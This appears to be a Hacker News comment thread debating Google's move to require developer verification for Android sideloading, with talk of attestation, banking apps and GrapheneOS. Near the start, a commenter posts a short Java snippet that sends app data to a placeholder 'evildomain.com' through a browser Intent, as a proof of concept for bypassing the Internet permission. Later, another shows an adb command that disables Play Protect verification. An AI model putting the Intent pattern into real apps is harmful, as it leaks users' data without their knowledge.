> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
  Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE");
  Intent i = new Intent(Intent.ACTION_VIEW, uri);
  startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.
That's also why there's a warning before installing really old apps, they may run with extra permissions.
"Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.
Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0]. Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.
The internet permission is the only regular manifest permission you can't toggle in the settings. It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
> The internet permission is the only regular manifest permission you can't toggle in the settings.
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
Huh? Not sure how this qualifies as "whack ass". There's an internet permission built in to the OS that Google chose to not expose to the user. The parent poster was claiming there is no reason anyone would want that permission, I then pointed out a whole category of apps that don't need internet to function for anything besides ads and telemetry. All of this is factual info.
So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?
The internet permission is exposed to the user, it just can't be revoked by the user. But that's true of like 100 other permissions, too. It's the default case that permissions are not revokable.
And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain
I would really like to deny internet access for apps like mx player. The frequency of ads on that app once Times group bought is the worst I've seen in my entire life. One of the best video players on Android, ruined.
Some Chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
Very much my exact feelings. I had the first Android phone ever and even wrote my own APKs and enjoyed the freedom of the mobile platform that let me install my own software. But it's been close to 20 years and maybe it's time to check out the other side, as much as I despise Apple's locked down ecosystem.
I'd sooner get a Chinese phone that isn't "Google-certified" than reward this behaviour by giving $1000+ to the DRM OGs at Cupertino. Neither Apple nor Google are protecting users against the alleged data-stealing evils of Tiktok, so how exactly are they providing any kind of "user safety" by throwing up fees and red tape for small independent developers?
Just a note for readers that the Jolla C2 cellular modem only supports European bands, so if you're in the US you're out of luck on that front until they release a new model.
I used it as my first phone for some 10 years. I type this message on one. I like their perseverance, but the truth is it's declining in practical usability.
Edit: In EU, so (lack of) bands are not an issue for me.
Yes, I was checking this out! Sailfish with Android compat seems very compelling. The videos I saw on YouTube showed a bit less polish than I'd prefer, but I'd be OK with that. But then I read up on the manufacturer they partnered with. Reeder, I believe? I ended up looking up some other devices they made and there seem to be build quality problems...I haven't seen reports like this for the Jolla C2, though, so I still might be tempted to purchase one just to see how it drives. Thanks for the recommendation!
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully managed mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).
My bank’s app doesn’t even work or even install on my phone because the bank considers my phone too old. So if they suddenly required the app to log in, I simply wouldn’t be able to bank with them. So they would lose my checking, investment, and HSA business when I move to another bank.
I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.
What gp is saying is that to access banking from desktop will require an approved OS and attestation just like on mobile.
The current state of affairs is that an approved OS and attestation are only required on mobile but not on desktop.
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
> can only be installed in one device at the same time
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
I use the Signal fork Molly to get messages on multiple phones. One remains the primary and the others linked, but I get messages even if the primary is off.
I have a huge problem with companies using their own apps for 2FA.
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Is that a thing Google logins can be set to require? I _can_ use the Gmail app on a device for 2FA, I can also press "try another method" and use any 2FA app.
I do like how many apps are starting to play nice with 3rd party authenticators. I use MS Authenticator for a bunch of things. Although knowing MS it has some massive license fee for them to support.
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
For logins, at least, they support passkeys on the desktop as well, so long as the browser does it. Which basically means Win11 or macOS, either some Blink-based browser or Safari.
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
I never really got into "phone" programming, always waiting for the shenanigans to die down. But somehow the shenanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
> I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
> There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It's not enough to not have a law against it, we need to have and enforce laws requiring it.
Some developers did. Others, who didn't care so much, got into the app store instead, and got rich off it. Users didn't care about such principles and mobile-first has been a viable strategy for a long time now. Not having something of an app is a problem if you want to stay in many markets.
Developers want a stable, secure platform where they can reach customers that trust the platform and are willing to transact. Everything is downstream of that, including any philosophy around control.
Developers are businesses and the economics need to work. For that, safety and security is much more important than openness.
Oh! Classic Survivorship bias. You're only looking at the devs who went into business in the phone ecosystem in the first place. I'm thinking that they're there despite the barriers to entry ('shenanigans'), and the ones you encounter happen to be those who happen to place a higher value on 'other values'. As the ecosystem gets locked down more, this effect becomes stronger.
Meanwhile, you're not looking at those who left, or those who decided to never enter a broken market dominated by players convicted of monopolistic practices.
This seems much more intuitive than a hypothesis where somehow people would prefer to enter a closed market over a fair and open market with no barriers to entry.
Remember, monopolists succeed because they are distorting the market, not because they are in fact the most efficient competitor.
You now need to have an online account to set up and log in on a Windows desktop. It's obvious what the trend is and it's not allowing consumers control over their stuff.
Just look up how to skip the "OOTB (out of the box) experience" and you can still bypass having to set up a cloud account on Windows 11 and can just set up a local account like normal. :)
I have been a computer user, developer and a system administrator for longer than I care to recount. I don't like Windows and I don't use it at work or home. But I do encounter it from time to time, and the experience is worse each time. The last time it happened, I couldn't figure out the way to skip/bypass the cloud account set up. Would it have been possible if I tried harder, starting with a web search? Perhaps. But there is no way an average system user is going to have the patience or often the skill necessary to do it. I'm not challenging their intelligence. But people have other priorities than to jump through a dozen hoops just to preserve privacy. I would do the same if I had to set up a Windows system for urgent work.
These sorts of hurdles exist to push more and more users to their favorite workflow until the dissenting voice is too feeble to notice when they finally pull the plug on the straightforward method. The intent is certainly there, since they are quite evidently boiling the frog. Just wait for the fine day when you wake up in the morning to see an HN story just like this one about Windows login as well.
The Nazis were initially quite squeamish about taking the lives of innocent civilians. It was in 1939 that a Nazi supporter wrote to Hitler requesting permission to euthanize his severely disabled infant son [1], who he described as 'a monster'. Hitler sent his personal physician Karl Brandt to Leipzig to assess the situation. Upon confirmation, Hitler personally authorized Brandt to arrange the euthanasia, with the promise to protect him legally. Don't forget that these were the Nazis, the original.
Once that happened, they gradually tried the idea with other disabled children, eventually progressing to deceiving the parents to get the permission. Then it got extended to teenagers and eventually adults, including disabled war veterans. Then there was a backlash and it stopped for a while. But it reappeared eventually, this time on an industrialized scale - the final solution. Disabilities were not the limit anymore. Arguably the worst genocide in human history started with the reluctant murder of a 5 month old infant, just 6 years before reaching its peak at the end of the war.
This is the classic example of a slippery slope. One hesitant misstep is the beginning. But as they realize its benefits (to them), they double down and gradually expand the scope until nothing is exempted. The consumer electronics industry and the software industry are certainly no exceptions to this. Is it too dramatic and hyperbolic to compare them to the Nazis? Admittedly, a bit. But perhaps it's not a bad idea to shame them like that, because clearly nothing else is working (with all due respect to the victims of the original). And it's not like they hesitate to shame us when it suits them.
Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bullshit to me. The vast majority of reasoning for why the judiciary makes the decisions it does is because of "precedent". Slippery slope is how the world operates. It surfaces everywhere, and when the slope we're sliding down matters, like this one, we have to fight back with fervor. Google isn't doing this in a vacuum; they're doing this because there's precedent for it, and because all they want is to assert more power over the world.
Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable. Everyone who even glances near this decision should feel overwhelming shame. If you have a shred of political power to fight this internally, you are a failure to yourself, your customers, and the world if you choose to stay silent. They'll read comments like these and think "we're right, we're being brave", because they have convinced themselves that there is bravery in wielding overwhelming power against their users.
> Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bullshit to me.
I don't know if I got this wrong, but the 'slippery slope' argument by itself never appeared to be a logical fallacy to me. There are numerous valid examples of it, and that's the context of its use in my previous reply. There certainly is a 'slippery slope' logical fallacy, but I thought it meant that you are misapplying/misusing the slippery slope argument where it isn't valid or doesn't apply.
> Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable.
I was going to apply the Nazi label on them and everyone else who uses such sleazy tactics. I hesitated because a lot of people are still emotional about the Holocaust (it has been 80 years) and object to equating anything with Nazism. But I sometimes wonder if the objection is meant only to silence the critics. While their actions haven't yet reached the magnitude of atrocities committed by the Nazis, their actions certainly are consistent with the Nazi tactics. Besides, it's not as if they had any qualms labeling ordinary people 'Pirates' for sharing media. Therefore I feel it's quite appropriate to apply to them and promote the label of 'Supply Side Nazis'.
I made and released some apps in the early days. Got tired of it and got tired of the reminders from Google to add banners, screenshots, submitting icons to support multiple resolutions... notifications that apps I haven't touched in a decade are no longer compatible, etc.
So much extra work involved that isn't building the app.
Got tired of this with a few extensions I made too. It felt like every year or so they'd completely break some API and I'd have to go switch to the new one, then they wanted a privacy policy, then justification for permissions, etc etc. Wasn't worth the trouble eventually and I just let them die.
Even aside from the privacy implications (which aren't trivial themselves), doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am I misremembering and/or has something changed in this process? Am I missing something?
Not just difficult - it becomes impossible. You can no longer develop any android app without Google's approval, just like iOS. The official emulators might not even work.
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to set up Android signing keys and needing to provide ID is not fun.
It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, Google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a Google-approved one, and alternatives still are decades behind in terms of app ecosystem.
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
Asking where somebody's from and having them respond with the state is not unreasonable -- you can already tell they’re American from the accent. The US is huge, about half of its states have more land area than half of the countries in the world. Asking where someone is from and receiving "the US" in response is about as informative as someone from Europe replying "Europe". Like yeah, obviously, I could tell by your accent, but where in Europe?
Funny thing is that americans do that all the time, even in international settings like a coworking space full of expats. Everybody introducing themselves with a "hi, I'm from this country", except americans telling their state or city. Are they expecting us to be familiar with their geography, or just unaware of alternative geographical frames of reference?
I'd think passive recognition of a fair few states would be a pretty low bar for relatively educated, English-speaking people. It's a pretty low bar, just placing a region with its country. People also regularly just assume that level of knowledge for globally- or culturally-relevant cities.
Maybe I think too highly of people, but I'd also imagine most would be able to get say... 6/10 right, for which countries the following list is from:
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
If I can't run F-Droid and termux and all that, I have no need for Android's supposed freedom. I'll just use an iPhone (it would be the first time!), minimize my use of mobile platforms to the maximum extent I can and stick with Linux laptops.
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
I’ve been daily driving a Librem 5 for two years. It’s not compelling, but I’m surprised at how little all those tiny inconveniences matter in the long run.
I think we tend to underestimate our ability to get used to stuff.
If both phone OS's are going to be the exact same on user choice then you might as well compare the two on their merits and this is not a comparison Android wins.
I rely on fdroid and am not sure what I'll do with this pixel 6a. I sometimes root, sometimes don't but I may have to get on the lineageos program full time. And I'm hoping for a rumored last batch of pinephone pro phones to be available later this month although I have no illusions about it being a real daily driver.
fdroid is based in the EU and the Cyber Resilience Act was already going to force them to either make their filters more strict (absolutely prohibit anything with any sort of "monetization"), or start collecting this data.
If they have anything on the platform that is subject to the CRA, they are a distributor:
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
An unofficial build of Android, like Grapheneos. It likely won't be able to install apps from the Play Store, but at that point it might be a blessing.
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases have already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in pixel phones first, and is now required by play integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
True, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. Unfortunately, with the 10 series Pixels they will no longer be releasing device trees, which makes it much more difficult to maintain custom ROMs.
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
> without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization
I find it easier to do a git commit once every 89 days and see my app auto refreshed through Testflight for me and anyone else I care to let use it.
If you look at the build system SaaS pricing or even IDE pricing on Show HNs here, the Xcode cloud build and distribution ecosystem is an absolute steal at $9 a month. Private Testflight (with no review) can be more convenient than that desktop cable.
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
adb shell settings put global package_verifier_user_consent -1
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in e.g. Unreal Engine, etc.)
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
I really hope this ends up being possible! Play Protect seems to jump up every so often and try to scare me into turning it on. Very annoying. I've wanted to disable Play Protect permanently, but never did the query to learn how, so thank you.
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only.
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
> There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
Funnily, Google is one of the few phone manufacturers who can’t make emergency calls work. (e.g. search Pixel problems)
Thank you, all HNers at Google, for continuing to work there.
And yes, before you ask, I have personally quit a job that paid 3x what I was able to get elsewhere over ethics. And no, I'm not rich, probably bottom 5% in terms of assets among my colleagues, coming from a lower-class background.
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Unless this is used to block TikTok or ChatGPT users still won’t care and people will still laugh at us for caring, or think wanting privacy or control of your computers is suspicious or ungood.
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
We had no part in this. The blame lies squarely with Google and its employees, who trade away user freedom for profit and career gain. Many who are smart enough to know better but instead compromise their principles. It's just another symptom of late-stage capitalism.
If your business idea doesn't work without you being evil, you deserve to go bankrupt. I perceive a tendency to assume it is necessary for a company like Google to maintain full control over our ecosystem to further our progress and maintain order. However, we should know by now that this isn't the case. You don't have to be evil to be useful. See GNOME, GrapheneOS, Steam, KDE, Wikipedia, Linux or Mozilla (previously). Tricking us of their inevitability is their greatest success.
Sep.2026: "The requirement goes into effect in Brazil, Indonesia, Singapore, and Thailand. At this point, any app installed on a certified device in these regions must be registered by a verified developer."
Any hint why those countries first?
Is it a local law there driving this whole move? Is a critical mass of malware originating from there?
So what's the solution? What's the reaction of semiofficial Android forks? Should we switch to Huawei now? Should we then have two phones? One with Android fork and one with some other "official" OS?
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst, and at best steal your data and serve nonstop pop-up ads.
Don't get me started. Every single app I search for on the play store gets a first sponsored result that is a completely different app. It is so utterly broken by design.
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
It makes total sense to the average person. There has been a constant stream of “yet another Android user got scammed out of their life savings because of Android side loading; iPhone users not affected”
It’s an inconvenient fact for power users, but side loading makes users significantly more vulnerable to scams and restricting side loading is both a predictable and reasonable response to that fact.
If you don’t like this, you need a better argument than “my desire to run any app I want is more important than pensioners losing their life savings” because that is not a winning argument with the average person, with governments, or with Google/Apple.
> As I’ve mentioned here before, sideloading is a genuine security concern, not merely an excuse for Apple to exert control. There is a never-ending stream of people losing their life savings. It happens on Android and not iOS because Android allows sideloading and iOS doesn’t. There is a very real human cost to this.
> Police warn new Android malware scam can factory reset phones; over S$10 million lost in first half of 2023
> There have been more than 750 cases of victims downloading the malware into their phones in the first half of 2023, with losses of at least S$10 million (US$7.3 million).
> 74-year-old man loses $70k after downloading third-party app to buy Peking duck
> “I couldn’t believe the news. I thought: Why am I so stupid? I was so angry at myself for being cheated of my life savings. My family is frustrated and I ended up quarrelling with my wife,” said Mr Loh, who has three children.
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial
> "Based on our analysis of major fraud malware families that exploit these sensitive runtime permissions, we found that over 95 per cent of installations came from internet-sideloading sources," it added.
> Android users in Singapore tried to install unverified apps nearly 900,000 times in past 6 months
> These attempts were blocked by a security feature rolled out by Google six months ago as part of a trial to better protect users against malware scams, which led to at least S$34.1 million (US$25.8 million) in losses last year with about 1,900 cases reported.
When governments across the globe are becoming more authoritarian, we need to protect our ability to run whatever app we want. Otherwise they'll ban communication apps when we step out of line and protest, as we've seen in places like Hong Kong on more locked down platforms like iOS. This isn't about power users. It doesn't matter how many links you post. The US is literally turning into an authoritarian dictatorship before our eyes. Germany's AfD now commands 25% of the vote and it keeps increasing. Far right parties are gaining ground everywhere.
We can't be handwringing about safety right now, because our right to free speech and to protest are at stake. Our democracies are at stake here.
All of those links 404 for me. Can you explain how the malware works? You are aware that it's not the app store that protects you, but the sandboxing? Are these impersonation vectors, i.e. phishing?
I didn’t notice that Hacker News had truncated the URLs for display. You can get to the articles by following the links in the original comment.
> You are aware that it's not the app store that protects you, but the sandboxing?
Both protect you.
> Are these impersonation vectors, ie phishing?
It’s a variety of things. Some use accessibility hooks to act as key loggers. Some seem to use exploits. Some are phishing by impersonating other apps.
I know the situation in Singapore and Thailand and I was curious if there would be anyone mentioning it in this discussion. Thank you for your comment, you should be upvoted.
I think this might backfire in that it might be enough to prompt technical people to seriously start looking for alternatives.
I personally will be extremely unhappy if I no longer can run dns66, newspipe or Firefox with ad blocking on my phone.
I think I might also start spending less time on my phone, which would be a good thing for me and a terrible thing for Google (in aggregate of course).
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
Side note, I read that the GrapheneOS project is having some challenges recently... between [0] the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1] one of Graphene's two core contributors being detained/conscripted into a war.
If an alternative, privacy-focused OS like Graphene can support contactless payments (universal, like Google Wallet does it, not having to install an app per bank or card), and can 100% reliably get around apps requiring SafetyNet (or whatever they call it now) attestation, then I'd start using it.
I'd also need an alternate, safe source for common apps like Uber, Lyft, Slack, Kindle, Doordash, my banking/credit card apps, and a host of others that I use regularly. (And, no, "just use their website" is not acceptable; their website experiences are mostly crap.)
Way long ago I used to run CyanogenMod on my Android phones, and it was trivially easy to get every single app I needed working. Now it's a huge slog to get everything working on a non-Google-blessed OS, and I expect some things I use regularly just won't work. I hate hate hate this state of affairs. It makes me feel like I don't actually own my phone. But I've gotten so used to using these apps and features that it would reduce my quality of life (I know that sounds dramatic, but I'm lacking a better way to put it) to do without.
For those watching this stuff, there are two other promising paths using ZK-proofs which might disarm the tradeoff situation we've been stuck in. Banking apps etc aren't willing to eat the liability of devices that are rooted or running alternate OSes, and Google's been banking on the exclusivity that brings from being both hardware and security provider.
Path 1: a ZK-proof attestation certificate marketplace implemented by GrapheneOS (or similar) to prove safety in a privacy-securing way enough for 3rd party liability insurance markets to buy in. Banks etc can be indifferent, and wouldn't ignore the market if it got big enough. This would mean we could root any device with aggressive hacking and then apologize for it with ZK-proof certs that prove it's still in good hands - and banking apps don't need to care. No need for hard chains of custody like the Google security model.
Path 2: Don't even worry too hard about 3rd party devices or full OSes, we just need to make the option viable enough to shame Google into adopting the same ZK certificate schemes defensively. If they're reading all user data through ZK-proof certs instead of just downloading EVERYTHING then they're significantly neutered as a Big Brother force and for once we're able to actually trust them. They'd still have app marketplace centrality, but if and when phones are being subdivided with ZK-proof security it would make 3rd party monitoring of the dynamics of how those decisions get made very public (we'd see the same things google sees), so we could similarly shame them via alternatives into adopting reasonable default behaviors. Similar to Linux/Windows - Windows woulda been a lot more evil without the alternative next door.
All of my bank apps work fine on Graphene. I'd switch banks if their app stopped working, not stop using Graphene. I stopped using Google Wallet, I don't miss it enough to justify using stock Android. For other apps, I just put them in a separate profile that has Google Play installed/configured. It really wasn't bad. The worst part is wiping your phone to install Graphene the first time, I prefer just to get a new device for it so I can move stuff over.
"Many other devices are supported by GrapheneOS at a source level, and it can be built for them without modifications to the existing GrapheneOS source tree."
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
This is a good start! I think we need something like a ProtonDB for this sort of thing, but that covers all apps, not just banking apps.
I do see five banking apps I use listed there as working, which is great. But -- and maybe I'm being unnecessarily overly worried about this -- what about the future? What if I've been using Graphene for a year or two, and one of the ones that's critical for me changes how they operate, and Graphene no longer passes muster as a platform it will run on. I'm not afraid of this happening at all running Google's stock OS image, but once I do my own thing, I get to keep the pieces when it breaks.
I love how so many of the responses in this thread are "it works for my particular bank" or "my bank's website is good enough" or "I'd only need it to deposit checks, but I never need to do that"... as if those are actually helpful responses to this general problem.
Many many people have banking apps that will not work on non-Google-blessed devices, use banks that have mobile websites that are terrible, and need to do mobile check deposits (which is usually only available in the app, and not the mobile website, if the bank even has one). And no, we're not going to "change our bank".
The reality is that there are so many things that break, sometimes in subtle ways, when you try to use an alternative Android OS. Some people may not have any problems, and that's great! But many -- I would dare to say most -- will.
And there's also a ton of uncertainty: I don't really want to wipe my phone, install GrapheneOS, spend hours messing with it and setting it up, only to find that something critical doesn't work, and now I have to flash back to the stock OS, and hope I can restore everything the way it was.
There's bound to be tradeoffs between scrappy open source communities and trillion dollar industry behemoths. The fact that it's this close of a call is pretty amazing. And really you can blame your bank for not making a usable mobile site. A lot of businesses like to force users into apps because it helps with engagement metrics, not because there's any functional benefit.
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my bank's app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
What bank is this? No bank I know /requires/ you to use a mobile app for anything; the web is enough. 2FA can usually be done via email, SMS, or a google-authenticator-compatible app.
They have a nice web app, but you must use their mobile app to login on the web version. The app takes a video of a QR code on the web page during login. Web login completes as soon as the mobile app notifies the server. There's no 2FA code to enter, and no alternative.
I asked them about this, by phone call, when my phone screen broke and I urgently needed to make a transaction. Surely there was an alternative? Or could I do the transaction by phone call?
